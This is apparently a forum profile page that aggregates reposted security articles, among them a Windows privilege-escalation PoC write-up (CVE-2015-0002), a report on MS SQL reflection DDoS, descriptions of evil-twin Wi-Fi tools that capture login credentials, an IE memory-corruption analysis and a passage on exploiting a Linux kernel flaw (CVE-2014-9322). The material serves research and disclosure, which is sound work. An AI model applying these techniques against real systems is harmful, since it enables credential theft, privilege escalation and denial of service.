-
Posts
18794 -
Joined
-
Last visited
-
Days Won
742
Everything posted by Nytro
-
Posted by James Forshaw currently impersonating NT AUTHORITY\SYSTEM. Much as I enjoy the process of vulnerability research sometimes there’s a significant disparity between the difficulty of finding a vulnerability and exploiting it. The Project Zero blog containsnumerousexamples of complex exploits for seemingly trivial vulnerabilities. You might wonder why we’d go to this level of effort to prove exploitability, surely we don’t need to do so? Hopefully by the end of this blog post you’ll have a better understanding of why it’s often the case we spend a significant effort to demonstrate a security issue by developing a working proof of concept. Our primary target for a PoC is the vendor, but there are other benefits for developing one. A customer of the vendor’s system can use the PoC to test whether they’re vulnerable to the issue and ensure any patch has been correctly applied. And the security industry can use it to develop mitigations and signatures for the vulnerability even if the vendor is not willing or able to patch. Without the PoC being made available only people who reverse engineer the patch are likely to know about it, and they might not have your best interests in mind. I don’t want this blog post to get bogged down in too much technical detail about the bug (CVE-2015-0002 for reference). Instead I’m going to focus on the process of taking that relatively simple vulnerability, determining exploitability and developing a PoC. This PoC should be sufficient for a vendor to make a reasonable assessment of the presented vulnerability to minimize their triage efforts. I’ll also explain my rationale for taking various shortcuts in the PoC development and why it has to be so. Reporting a Vulnerability One of the biggest issues with vulnerability research on closed or proprietary systems is dealing with the actual reporting process to get a vulnerability fixed. This is especially the case in complex or non-obvious vulnerabilities. If the system is open source, I could develop a patch, submit it and it stands a chance of getting fixed. For a closed source system I will have to go through the process of reporting. To understand this better let’s think about what a typical large vendor might need to do when receiving external security vulnerability reports. This is a really simplified view on vulnerability response handling but it’s sufficient to explain the principles. For a company which develops the majority of their software internally I would have little influence over the patching cycle, but I can make a difference in the triage cycle. The easier I can make the vendor’s life the shorter the triage cycle can be and the quicker we can get a patch released. Everyone wins, except hopefully the people who might be using this vulnerability already. Don’t forget just because I didn’t know about this vulnerability before doesn’t mean it isn’t already known about. In an ideal vulnerability research world (i.e. one in which I have to do the least amount of non-research work) if I find a bug all I’d need to do is write up some quick notes about it, send it to a vendor, they’ll understand the system, they’ll immediately move heaven and earth to develop the patch, job done. Of course it doesn’t work that way, sometimes just getting a vendor to recognize there’s even a security issue is an important first step. There can be a significant barrier between moving from the triage cycle to the patch cycle, especially as they’re usually separate entities inside a company. To provide for the best chance possible I’ll do two things: Put together a report of sufficient detail so the vendor understands the vulnerability Develop a PoC which unequivocally demonstrates the security impact Writing up a Report Writing up a report for the vendor is pretty crucial to getting an issue fixed, although it isn’t sufficient in many cases. You can imagine if I wrote something like, “Bug in ahcache.sys, fixit, *lol*” that doesn’t really help the vendor much. At the very least I’d want to provide some context such as what systems the vulnerability affects (and doesn’t affect), what the impact of the vulnerability is (to the best of my knowledge) and what area of the system the issue resides. Why wouldn’t just the report be sufficient? Think about how a large modern software product is developed. It’s likely developed between a team of people who might work on individual parts. Depending on the age of the vulnerable code the original developer might have moved on to other projects, left the company entirely or been hit by the number 42 bus. Even if it’s relatively recent code written by a single person who’s still around to talk to it doesn’t mean they remember how the code works. Anyone who’s developed software of any size will have come across code they wrote, a month, week or even a day ago and wondered how it works. There’s a real possibility that the security researcher who’s spent time going through the executable instruction by instruction might know it better than anyone in the world. Also you can think about the report in a scientific sense, it’s your vulnerability hypothesis. Some vulnerabilities can be proven, for example a buffer overflow can typically be proven mathematically, placing 10 things into space for 5 doesn’t work. But in many cases there’s nothing better than empirical proof of exploitability. If done right it can be experimentally validated by both the reporter and the vendor, this is the value of a proof-of-concept. Correctly developed the vendor can observe the effects of the experiment, converting my hypothesis to a theory which no-one can disprove. Proving Exploitability through Experimentation So the hypothesis posits that the vulnerability has a real-world security impact, we’ll prove it objectively using our PoC. In order to do this we need to provide the vendor not just with the mechanism to prove that the vulnerability is real but also clear observations that can be made and why those observations constitute a security issue. What observations need to be made depend on the type of vulnerability. For memory corruption vulnerabilities it might be sufficient to demonstrate an application crashing in response to certain input. This isn’t always the case, some memory corruptions don’t provide the attacker any useful control. Therefore demonstrating control over the current execution flow, such as controlling the EIP register is usually the ideal. For logical vulnerabilities it might be more nuanced, such as you can write a file to a location you shouldn’t be able to or the calculator application ends up running with elevated privileges. There’s no one-size-fits-all approach, however at the very least you want to demonstrate some security impact which can be observed objectively. The thing to understand is I’m not developing a PoC for the purposes of being a useful exploit (from an attacker perspective) but to prove it’s a security issue to a sufficient level of confidence that it will get fixed. Unfortunately it isn’t always easy to separate these two aspects and sometimes without demonstrating local privilege escalation or remote code execution it isn’t taken as seriously as it should be. Developing a Proof of Concept Now let’s go into some of the challenges I faced in developing a PoC for the ahcache vulnerability I identified. Let’s not forget there’s a trade off between the time spent developing a PoC and the chance of the vulnerability being fixed. If I don’t spend enough time to develop a working PoC the vendor could turn around and not fix the vulnerability, on the other hand the more time I spend the longer this vulnerability exists which is potentially as bad for users. Vulnerability Technical Details Having a bit of understanding of the vulnerability will help us frame the discussion later. You can view the issue here with the attached PoC that I sent to Microsoft. The vulnerability exists in the ahcache.sys driver which was introduced in Windows 8.1 but in essence this driver implements the Windows native system call NtApphelpCacheControl. This system call handles a local cache for application compatibility information which is used to correct application behaviour on newer versions of Windows. You can read more about application compatibility here. Some operations of this system call are privileged so the driver does a check of the current calling application to ensure they have administrator privileges. This is done in the function AhcVerifyAdminContext which looks something like the following code: BOOLEAN AhcVerifyAdminContext() { BOOLEAN CopyOnOpen; BOOLEAN EffectiveOnly; SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; PACCESS_TOKEN token = PsReferenceImpersonationToken( NtCurrentThread(), &CopyOnOpen, &EffectiveOnly, &ImpersonationLevel); if (token == NULL) { token = PsReferencePrimaryToken(NtCurrentProcess()); } PSID user = GetTokenUser(token); if(RtlEqualSid(user, LocalSystemSid) || SeTokenIsAdmin(token)) { return TRUE; } return FALSE; } This code queries to see if the current thread is impersonating another user. Windows allows a thread to pretend to be someone else on the system so that security operations can be correctly evaluated. If the thread is impersonating a pointer to an access token is returned. If NULL is returned from PsReferenceImpersonationToken the code queries for the current process’ access token. Finally the code checks whether either the access token’s user is the local system user or the token is a member of the Administrators group. If the function returns TRUE then the privileged operation is allowed to go ahead. This all seems fine, so what’s the issue? While full impersonation is a privileged operation limited to users which havethe impersonate privilege in their token, a normal user without the privilege can impersonate other users for non-security related functions. The kernel differentiates between privileged and unprivileged impersonation by assigning a security level to the token when impersonation is enabled. To understand the vulnerability there’s only two levels of interest, SecurityImpersonation which means the impersonation is privileged and SecurityIdentification which is unprivileged. If the token is assigned SecurityIdentification only operations such as querying for token information, such as the token’s user is allowed. If you try and open a secured resource such as a file the kernel will deny access. This is the underlying vulnerability, if you look at the code the PsReferenceImpersonationToken returns a copy of the security level assigned to the token, however the code fails to verify it’s at SecurityImpersonation level. This means a normal user, who was able to get hold of a Local System access token could impersonate at SecurityIdentification and still pass the check as querying for the user is permitted. Proving Trivial Exploitation Exploiting the bug requires capturing a Local System access token, impersonating it and then calling the system call with appropriate parameters. This must be achievable from normal user privilege otherwise it isn’t a security vulnerability. The system call is undocumented so if we wanted to take a shortcut could we just demonstrate that we can capture the token and leave it at that? Well not really, what this PoC would demonstrate is that something which is documented as possible is indeed possible. Namely that it’s possible from a normal user to capture the token and impersonate it, as the impersonation system is designed this would not cause a security issue. I knew already that COM supports impersonation, that there’s a number of complex system privileged services (for example BITS) we can communicate with as a normal user that we could convince to communicate back to our application in order to perform the impersonation. This wouldn’t demonstrate that we can even reach the vulnerable AhcVerifyAdminContext method in the kernel let alone successfully bypass the check. So starts the long process of reverse engineering to work out how the system call works and what parameters you need to pass to get it to do something useful. There’s some existing work from other researchers (such as this) but certainly nothing concrete to take forward. The system call supports a number of different operations, it turned out that not all the operations needed complex parameters. For example the the AppHelpNotifyStart and AppHelpNotifyStop operations could be easily called, and they relied on the AhcVerifyAdminContext function. I could now produce a PoC which we can verify bypasses the check by observing the system call’s return code. BOOL IsSecurityVulnerability() { ImpersonateLocalSystem(); NTSTATUS status = NtApphelpCacheControl(AppHelpNotifyStop, NULL); return status != STATUS_ACCESS_DENIED; } Is this sufficient to prove exploitability? History has taught me no, for example this issue has almost the exact same sort of operation, namely you can bypass an administrator check through impersonation. In this case I couldn’t produce sufficient evidence that it was exploitable for anything other than information disclosure. So in turn it was not fixed, even though it was effectively a security issue. To give ourselves the best chance of proving exploitability we need to spend more time on this PoC. Improving the Proof-of-Concept In order to improve upon the first PoC I would need to get a better understanding of what the system call is doing. The application compatibility cache is used to store the lookup data from the application compatibility database. This database contains rules which tell the application compatibility system what executables to apply “shims” to in order implement custom behaviours, such as lying about the operating system’s version number to circumvent an incorrect check. The lookup is made every time a process is created, if a suitable matching entry is found it’ll be applied to the new process. The new process will then lookup the shim data it needs to apply from the database. As this occurs every time a new process is created there’s a significant performance impact in going to database file every time. The cache is there to reduce this impact, the database lookup can be added to the cache. If that executable is created later the cached lookup can quickly eliminate the expensive database lookup and either apply a set of shims or not. Therefore we should be able to cache an existing lookup and apply it to an arbitrary executable. So I spent some time working out the format of the parameters to the system call in order to add my own cached lookup. The resulting structure for Windows 8.1 32 bit looked like the following: struct ApphelpCacheControlData { BYTE unk0[0x98]; DWORD query_flags; DWORD cache_flags; HANDLE file_handle; HANDLE process_handle; UNICODE_STRING file_name; UNICODE_STRING package_name; DWORD buf_len; LPVOID buffer; BYTE unkC0[0x2C]; UNICODE_STRING module_name; BYTE unkF4[0x14]; }; You can see there’s an awful lot of unknown parts in the structure. This causes a problem if you were to apply this to Windows 7 (which has a slightly different structure) or 64 bit (which has a different sized structure) but for our purposes it doesn’t matter. We’re not supposed to be writing code to exploit all versions of Windows, all we need to do is prove the security issue to the vendor. As long as you inform the vendor of the PoC limitations (and they pay attention to them) we can do this. The vendor’s still better placed to determine if this PoC proves exploitability across versions of the OS, it’s their product after all. So I could now add an arbitrary cached entry but what can we actually add? I could only add an entry which would have been the result of an existing lookup. You could modify the database to do something like patch running code (the application compatibility system is also used for hotfixes) but that would require administrator privileges. So I needed an existing shim to repurpose. I built a copy of the SDB explorer tool (available from here) so that I could dump the existing database looking for any useful existing shim. I found that for 32 bit there’s a shim which will cause a process to start the executable regsvr32.exe passing the original command line. This tool will load a DLL passed on the command line and execute specific exported methods, if we could control the command line of a privileged process we could redirect it and elevate privileges. This again limits the PoC to only 32 bit processes but that’s fine. The final step, and what caused a lot of confusion was what process to choose to redirect. I could have spent a lot of time investigating other ways of achieving the requirement of starting a process where I control the command line. I already knew one way of doing it, UAC auto elevation. Auto elevation is a feature added to Windows 7 to reduce the number of UAC dialogs a typical user sees. The OS defines a fixed list of allowed auto elevating applications, when UAC is at it’s default setting then requests to elevate these applications do not show a dialog when the user’s an administrator. I can abuse this by applying a cache entry for an existing auto elevating application (in this case I chose ComputerDefaults.exe) and requesting the application runs elevated. This elevated application redirects to regsvr32 passing our fully controlled command line, regsvr32 loads my DLL and we’ve now got code executing with elevated privileges. The PoC didn’t give someone anything they couldn’t already do through various other mechanisms (such as this metasploit module) but it was never meant to. It sufficiently demonstrated the issue by providing an observable result (arbitrary code running as an administrator), from this Microsoft were able to reproduce it and fix it. Final Bit of Fun As there was some confusion on whether this was only a UAC bypass I decided to spend a little time to develop a new PoC which gets local system privileges without any reliance on UAC. Sometimes I enjoy writing exploits, if only to prove that it can be done. To convert the original PoC to one which gets local system privileges I need a different application to redirect. I decided the most likely target was a registered scheduled task as you can sometimes pass arbitrary arguments to the task handler process. So we’ve got three criteria for the ideal task, a normal user must be able to start it, it must result in a process starting as local system and that process must have an arbitrary command line specified by the user. After a bit of searching I found the ideal candidate, the Windows Store Maintenance Task. As we can see if runs as the local system user. We can determine that a normal user can start it by looking at the task file’s DACL using a tool such as icacls. Notice the entry in the following screenshot for NT AUTHORITY\Authenticated Users with Read and Execute (RX) permissions. Finally we can check whether a normal user can pass any arguments to the task by checking the XML task file. In the case of WSTask it uses a custom COM handler, but allows the user to specify two command line arguments. This results in the executable c:\windows\system32\taskhost.exe executing with an arbitrary command line as the local system user. It was just a case of modifying the PoC to add a cache entry for taskhost.exe and start the task with the path to our DLL. This still has a limitation, specifically it only works on 32 bit Windows 8.1 (there’s no 32 bit taskhost.exe on 64 bit platforms to redirect). Still I’m sure it can be made to work on 64 bit with a bit more effort. As the vulnerability is now fixed I’ve made available the new PoC, it’s attached to the original issue here. Conclusions I hope I’ve demonstrated some of the effort a vulnerability researcher would go to in order to ensure a vulnerability will be fixed. It’s ultimately a trade off between the time spent developing the PoC and the chances of the vulnerability being fixed, especially when the vulnerability is complex or non-obvious. In this case I felt I made the right trade-off. Even though the PoC I sent to Microsoft looked, on the surface to only be a UAC bypass combined with the report they were able to determine the true severity and develop the patch. Of course if they’d pushed back and claimed it was not exploitable then I would have developed a more robust PoC. As a further demonstration of the severity I did produce a working exploit which gained local system privileges from a normal user account. Disclosing the PoC exploit is of value to aid in a user’s or security company’s mitigation of a public vulnerability. Without a PoC it’s quite difficult to verify that a security issue has been patched or mitigated. It also helps to inform researchers and developers what types of issues to look out for when developing certain security sensitive applications. Bug hunting is not the sole approach for Project Zero to help secure software, education is just as important. Project Zero’s mission involves tackling software vulnerabilities, and the development of PoCs can be an important part of our duty to help software vendors or open source projects take informed action to fix vulnerabilities. Posted by Chris Evans at 5:27 PM Sursa: http://googleprojectzero.blogspot.co.uk/2015/02/a-tokens-tale_9.html
-
Attackers Using New MS SQL Reflection Techniques By Bill BrennerFebruary 12, 2015 6:30 AM The bad guys are using a fairly new technique to tamper with the Microsoft SQL Server Resolution Protocol (MC-SQLR) and launch DDoS attacks. In an advisory released this morning, Akamai's Prolexic Security Engineering & Response Team (PLXsert) described it as a new type of reflection-based distributed denial of service (DDoS) attack. PLXsert first spotted attackers using the technique in October. Last month, researcher Kurt Aubuchon studied another such attack and offered an analysis here. PLXsert replicated this attack by creating a script based on Scapy, an open-source packet manipulation tool. Download the full advisory How it works The attack manifests in the form of Microsoft SQL Server responses to a client query or request via abuse of the Microsoft SQL Server Resolution Protocol (MC-SQLR), which listens on UDP port 1434. MC-SQLR lets clients identify the database instance with which they are attempting to communicate when connecting to a database server or cluster with multiple database instances. Each time a client needs to obtain information on configured MS SQL servers on the network, the SQL Resolution Protocol can be used. The server responds to the client with a list of instances. Attackers abuse SQL servers by executing scripted requests and spoofing the source of the query with the IP address of the intended target. Depending on the number of instances present in the abused SQL server, the amplification factor varies. The attack presents a specific payload signature, producing an amplification factor of nearly 25x. In this case, the attacker's request totaled 29 bytes, including IP and UDP headers, and triggered a response of 719 bytes including headers. Some servers may produce a larger or smaller response depending on their configuration. Other tools publicly available on the Internet could reproduce this attack as well. Replicating this attack does not require a high level of technical skill. A scripted attack would only require a list of SQL servers exposed on the Internet that respond to the query. Attackers could use a unicast client request 0x03 or a broadcast request 0x02. Both are requests with a data length of 1 byte that will produce the same type of response from SQL servers. PLXsert identified a tool on GitHub on January 26, 2015, that weaponizes this type of attack for mass abuse. Defensive measures Server hardening procedures should always be applied to servers that are exposed to the Internet. As a general rule, services and protocols that are unnecessary should be disabled or blocked. This attack can only be performed by querying SQL servers with exposed SQL Server Resolution Protocol ports to the Internet. The following best practices can help mitigate this type of DDoS attack. These recommendations are by no means exhaustive and affected organizations should refine and adapt them further based on specific infrastructure and exposed services. Follow Microsoft Technet Security Best Practices to Protect Internet Facing Web Servers. The use of ingress and egress filters applied to SQL server ports at firewalls, routers, or edge devices may prevent this attack. If there is a business case for keeping UDP 1434 open, it should be filtered to only allow trusted IP addresses. Block inbound connections from the Internet, if ports are not needed for external access or administration. SQL Server Resolution Protocol service is not needed in servers that have only one database instance. This has been disabled by default since Microsoft SQL Server 2008. It is not disabled in earlier or desktop engine versions. Disable this service to prevent the abuse of SQL server for this type of attack. If the use of SQL Server Resolution Protocol service is needed, add an additional layer of security before the service is accessed, such as authentication via secure methods (SSH, VPN) or filtering as described above. Sursa: https://blogs.akamai.com/2015/02/plxsert-warns-of-ms-sql-reflection-attacks.html
-
gosms Your own local SMS gateway What's the use ? Can be used to send SMS, where you don't have access to internet or cannot use Web SMS gateways or want to save some money per SMS, or have minimal requirements for personal / internal use and such deploy in less than 1 minute supports Windows, GNU\Linux, Mac OS works with GSM modems provides API over HTTP to push messages to gateway, just like the internet based gateways do takes care of queuing, throttling and retrying supports multiple devices at once deployment Update conf.ini [DEVICES] section with your modem's COM port. for ex. COM10 or /dev/USBtty2 Run Sursa: https://github.com/haxpax/gosms
-
INFERNAL-TWIN This is the tool created to automate Evil Twin attack and capturing public and guest credentials of Access Point infernal-twin What this tool will do ? Set up monitoring interface Set up DB Scan wireless network in the range Connect to the network selected SSID Obtain login page of authentication Modify the login page with attacker controlled php script to obtain the credentials Set up Apache Server and serve fake login page Give a victim an IP Set up NAT table Dump the traffic Source && Download Sursa: infernal-twin - This is evil twin attack automated
-
3VILTWINATTACKER – ROGUE WI-FI ACCESS POINT This tool create an rogue Wi-Fi access point , purporting to provide wireless Internet services, but snooping on the traffic. 3vilTwinAttacker dependencies: Recommended for 3vilTwinAttacker – Kali linux. Ettercap. Sslstrip. Airbase-ng include in aircrack-ng. DHCP. Ubuntu $ sudo apt-get install isc-dhcp-serverKali linux $ echo "deb Index of /debian wheezy main " >> /etc/apt/sources.list $ apt-get update && apt-get install isc-dhcp-serverFedora $ sudo yum install dhcp 3vilTwinAttacker Options: Etter.dns: Edit etter.dns to loading module dns spoof. Dns Spoof: Start dns spoof attack in interface ath0 fake AP. Ettercap: Start ettercap attack in host connected AP fake Capturing login credentials. Sslstrip: The sslstrip listen the traffic on port 10000. Driftnet: The driftnet sniffs and decodes any JPEG TCP sessions, then displays in an window. Source && Download Sursa: 3vilTwinAttacker - Rogue Wi-Fi Access Point
-
WAIDPS – WIRELESS AUDITING AND IPS/IDS WAIDPS is an open source wireless swissknife written in Python and work on Linux environment. This is a multipurpose tools designed for audit (penetration testing) networks, detect wireless intrusion (WEP/WPA/WPS attacks) and also intrusion prevention (stopping station from associating to access point). Apart from these, it will harvest all WiFi information in the surrounding and store in databases. This will be useful when it comes to auditing a network if the access point is ‘MAC filtered’ or ‘hidden SSID’ and there isn’t any existing client at that moment. WAIDS may be useful to penetration testers, wireless trainers, law enforcement agencies and those who is interested to know more about wireless auditing and protection. The primarily purpose for this script is to detect intrusion. Once wireless detect is found, it display on screen and also log to file on the attack. Additional features are added to current script where previous WIDS does not have are : automatically save the attack packets into a file interactive mode where users are allow to perform many functions allow user to analyse captured packets load previously saved pcap file or any other pcap file to be examine customizing filters customize detection threshold (sensitivity of IDS in detection) At present, WAIDS is able to detect the following wireless attacks and will subsequently add other detection found in the previous WIDS. Association / Authentication flooding Detect mass deauthentication which may indicate a possible WPA attack for handshake Detect possible WEP attack using the ARP request replay method Detect possible WEP attack using chopchop method Detect possible WPS pin bruteforce attack by Reaver, Bully, etc. Detection of Evil-Twin Detection of Rogue Access Point WAIDPS Requirements No special equipment is required to use this script as long as you have the following : Root access (admin) Wireless interface which is capable of monitoring and injection Python 2.7 installed Aircrack-NG suite installed TShark installed TCPDump installed Mergecap installed (for joining pcap files) xterm installed Documentation <span style="font-family: Rajdhani"><strong> Source && Download Sursa: WAIDPS - Wireless Auditing and IPS/IDS
-
Microsoft Internet Explorer 9-11 Windows 7-8.1 Vulnerability (patched in late 2014) Feb 12, 2015 • suto I. Vunerability Description: Uninitialized Memory Corruption Lead to Code Execution. II.Analysis: I crafted an HTML file called 1.html and opened it with IE11/Windows 8.1, the following crash happened: The call tree lead to there : The root cause of problem is wrong assumtion and memory not clearly reset. When execute javascript line: document.getElementsByTagName('tr')[0].insertCell(); The function CTableRowLayout::EnsureCells will be called: Because adding a cell to row, it need to expand the memory to hold new row. First it will reAlloc memory in CimplAry::EnsureSizeWorker to enough for new tableRowLayout. The function success alloc memory as below: But it never reset memory to zero: The line: while ( v2 > v4 ) { --v2; *(_DWORD *)(*(_DWORD *)(v3 + 76) + 4 * v2) = 1; } Will mark if it exist a cell in that row. And the memory at the moment will be likely: 0xheap: 0x1 0x1 0x1 ……. 0xc0c0c0c0 The value 0xc0c0c0c0 is from uninitialized memory. So if we parepare some holes in memory by our string fit with that size, freed before it reallocate our value will be in that location like below ( when our string is 0x40404040 ) That happend because when javascript trying to add a new Row to Table: document.getElementsByTagName(‘table’)[0].insertRow(); But that piece of above memory will never be reset to 1 to indicate that has a cell in there. So after all, IE will trying to access that address,It saw our value as a Pointer to a Table’s Cell Object in Heap. From there it will calculation and Change some memory, with can be lead to Write to controlled memory and highly possible lead to bypass ASLR ( if the address overwrote is Array Lenght ) and Code execution. For full PoC code please email to suto@vnsecurity.net Happy hunting Sursa: Microsoft Internet Explorer 9-11 Windows 7-8.1 Vulnerability (patched in late 2014)
-
Decrypting TLS Browser Traffic With Wireshark – The Easy Way! Intro Most IT people are somewhat familiar with Wireshark. It is a traffic analyzer, that helps you learn how networking works, diagnose problems and much more. One of the problems with the way Wireshark works is that it can’t easily analyze encrypted traffic, like TLS. It used to be if you had the private key(s) you could feed them into Wireshark and it would decrypt the traffic on the fly, but it only worked when using RSA for the key exchange mechanism. As people have started to embrace forward secrecy this broke, as having the private key is no longer enough derive the actual session key used to decrypt the data. The other problem with this is that a private key should not or can not leave the client, server, or HSM it is in. This lead me to coming up with very contrived ways of man-in-the-middling myself to decrypt the traffic(e.g. sslstrip). Session Key Logging to the Rescue! Well my friends I’m here to tell you that there is an easier way! It turns out that Firefox and the development version of Chrome both support logging the symmetric session key used to encrypt TLS traffic to a file. You can then point Wireshark at said file and presto! decrypted TLS traffic. Read on to learn how to set this up. Setting up our Browsers So if you prefer to use Chrome you must use the Chrome dev channel for this to work, or the default firefox will work too. Next we need to set an environmental variable. On Windows: Go into your computer properties, then click “Advance system settings” then “Environment Variables…” Add a new user variable called “SSLKEYLOGFILE” and point it at the location that you want the log file to be located at. On Linux or Mac OS X: [TABLE=width: 704] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code]$ export SSLKEYLOGFILE=~/path/to/sslkeylog.log[/TD] [/TR] [/TABLE] You can also add this to the last line of your [TABLE=width: 704] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code]~/.bashrc[/TD] [/TR] [/TABLE] on Linux, or [TABLE=width: 704] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code]~/.MacOSX/environment[/TD] [/TR] [/TABLE] on OS X so that it is set every time you log in. The next time that we launch Firefox or the dev channel of Chrome they will log your TLS keys to this file. Setting up Wireshark You need at least Wireshark 1.6 for this to work. We simply go into the preferences of Wireshark Expand the protocols section: Browse to the location of your log file The Results This is more along the lines of what we normally see when look at a TLS packet, This is what it looks like when you switch to the “Decrypted SSL Data” tab. Note that we can now see the request information in plain-text! Success! Conclusion I hope you learned something today, this makes capturing TLS communication so much more straightforward. One of the nice things about this setup is that the client/server machine that generates the TLS traffic doesn’t have to have Wireshark on it, so you don’t have to gum up a clients machine with stuff they won’t need, you can either have them dump the log to a network share or copy it off the machine and reunite it with the machine doing the packet capture later. Thanks for stopping by! References: Mozilla Wiki Imperial Violet Photo Credit: Mike Sursa: https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/
-
The Agents Network (sau date persronale despre cativa de pe RST)
Nytro replied to arryichmann's topic in Off-topic
Totusi, ce cauta "black_death_c4t" acolo? -
I'm looking for someone to develop a Polymorphic crypter
Nytro replied to roberts78's topic in Cosul de gunoi
And about 1000$ budget or even more. You must have at least 50 posts in order to buy something. -
Da, nasol, incearca sa ii dai parametru de la -1 la 100 in timp ce testezi (Buffering...), sa apelezi la fiecare secunda sa zicem: Timer 1 sec: -> for(i = -1 to 100) { x = sop.GetState(i); writetofile("i = " & i & "state = " & x) Si sa verifici daca se schimb ceva...
-
Concerns regarding the security of biometric authentication February 2, 2015 Daniel Tomescu More and more gadgets that we use these days (smart phones, smart watches, etc) try to make a personal connection with the owner via his biometric characteristics.Using biometric measures for authentication purposes is a fast growing trend in the IT world, but there are genuine security concerns regarding the maturity level of these methods and their security faults. How safe is it to use biometrics for authentication? Can they be bypassed? Let’s find out! How to find a good biometric characteristic? At this moment, we have 3 main possibilities for verifying a user’s identity: something that the user knows (like a code or a passphrase), something that the user has (a smart card or a token) or something that the user is (a biometric characteristic).For a biometric characteristic to be considered a valid authentication method, it should have the following properties: Universality, meaning that the feature must be present on all individuals; Measurability, meaning that the feature can be measured and the individuals are willing to share it for measurement purposes; High accuracy, meaning that the feature can be measured with an acceptable error rate; Uniqueness, meaning that the feature should be different for every individual; Robustness, meaning that the feature should not vary in time for the same individual; Circumvention, meaning that the feature should not be easily altered, imitated or replicated by third parties. Although the standards might seem too restrictive, there are a big number of biometric characteristics that meet the requirements above (or at least most of them) and can be used in user recognition. Articol complet: Concerns regarding the security of biometric authentication – Security Café
-
Nu ar fi rau nici un astfel de serviciu.
-
Ar fi utila o optiune de descarcare ca MP3 a unui playlist de muzica.
-
Windows tcpip.sys Arbitrary Write Privilege Escalation
Nytro replied to Aerosol's topic in Exploituri
Super. Pacat ca e limitat. if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440) return Exploit::CheckCode::Vulnerable end -
Exploiting “BadIRET” vulnerability
Nytro posted a topic in Reverse engineering & exploit development
Exploiting “BadIRET” vulnerability February 2, 2015 / Rafal Wojtczuk Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation) Introduction CVE-2014-9322 is described as follows: arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not properly handle faults associated with the Stack Segment (SS) segment register, which allows local users to gain privileges by triggering an IRET instruction that leads to access to a GS Base address from the wrong space. It was fixed on 23rd November 2014 with this commit. I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there. All experiments were conducted on Fedora 20 system, running 64bit 3.11.10-301 kernel; all the discussion is 64bit-specific. Short results summary: With the tested kernel, the vulnerability can be reliably exploited to achieve kernelmode arbitrary code execution. SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution. Digression: kernel, usermode, iret The vulnerability In a few cases, when Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to bad_iret function, that does /* So pretend we completed the iret and took the #GPF in user mode.*/ pushq $0 SWAPGS jmp general_protection As the comment explains, the subsequent code flow should be identical to the case when general protection exception happens in user mode (just jump to the #GP handler). This works well in case of most of the exceptions that can be raised by iret, e.g. #GP. The problematic case is #SS exception. If a kernel is vulnerable (so, before kernel version 3.17.5) and has “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – “push” instruction generates a page fault that gets converted into double fault. I have not analysed this scenario; from now on, we focus on pre 3.16 kernel, with no “espfix”. The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. In comparison with e.g. #GP handler, the #SS exception handler does one extra swapgs instruction. In case you are not familiar with swapgssemantics, read the below paragraph, otherwise skip it. Digression: swapgs instruction When memory is accessed with gs segment prefix, like this: mov %gs:LOGICAL_ADDRESS, %eax the following actually happens: BASE_ADDRESS value is retrieved from the hidden part of the segment register memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced The base address is initially derived from Global Descriptor Table (or LDT). However, there are situations where GS segment base is changed on the fly, without involving GDT. Quoting SDM: “SWAPGS exchanges the current GS base register value with the value contained in MSR address C0000102H (IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction intended for use by system software. (…) The kernel can then use the GS prefix on normal memory references to access [per-cpu]kernel data structures.” For each CPU, Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure address. Therefore, the usual pattern of e.g. syscall handler is: swapgs (now the gs base points to kernel memory) access per-cpu kernel data structures via memory instructions with gs prefix swapgs (it undos the result of the previous swapgs, gs base points to usermode memory) return to usermode Naturally, kernel code must ensure that whenever it wants to access percpu data with gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is noneven (so that gs base points to kernel memory). Triggering the vulnerability By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, kernel will try to access important data structures with a wrong gs base, controllable by the user. When is #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of iret instruction, it says: 64-Bit Mode Exceptions: #SS(0) If an attempt to pop a value off the stack violates the SS limit. If an attempt to pop a value off the stack causes a non-canonical address to be referenced. None of these conditions can be forced to happen in kernel mode. However, the pseudocode foriret (in the same SDM) shows another case: when the segment defined by the return frame is not present: IF stack segment is not present THEN #SS(SS selector); FI; So, in usermode, we need to set ss register to something not present. It is not straighforward: we cannot just use mov $nonpresent_segment_selector, %eax mov %ax, %ss as the latter instruction will generate #GP. Setting the ss via debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on 64bits system (it might work on 32bit, though). The solution is: thread A: create a custom segment X in LDT via sys_modify_ldt syscall thread B: ss:=X_selector thread A: invalidate X via sys_modify_ldt thread B: wait for hardware interrupt The reason why one needs two threads (both in the same process) is that the return from the syscall (including sys_modify_ldt) is done via sysret instruction that hardcodes the ss value. If we invalidated X in the same thread that did “ss:=X instruction”, ss would be undone. Running the above code results in kernel panic. In order to do something more meaningful, we will need to control usermode gs base; it can be set via arch_prctl(ARCH_SET_GS) syscall. Achieving write primitive If we run the above code, then #SS handler runs fine (meaning: it will not touch memory at gs base), returns into bad_iret, that in turn jumps to #GP exception handler. This runs fine for a while, and then calls the following function: 289 dotraplinkage void 290 do_general_protection(struct pt_regs *regs, long error_code) 291 { 292 struct task_struct *tsk; ... 306 tsk = current; 307 if (!user_mode(regs)) { ... it is not reached 317 } 318 319 tsk->thread.error_code = error_code; 320 tsk->thread.trap_nr = X86_TRAP_GP; 321 322 if (show_unhandled_signals && unhandled_signal(tsk, 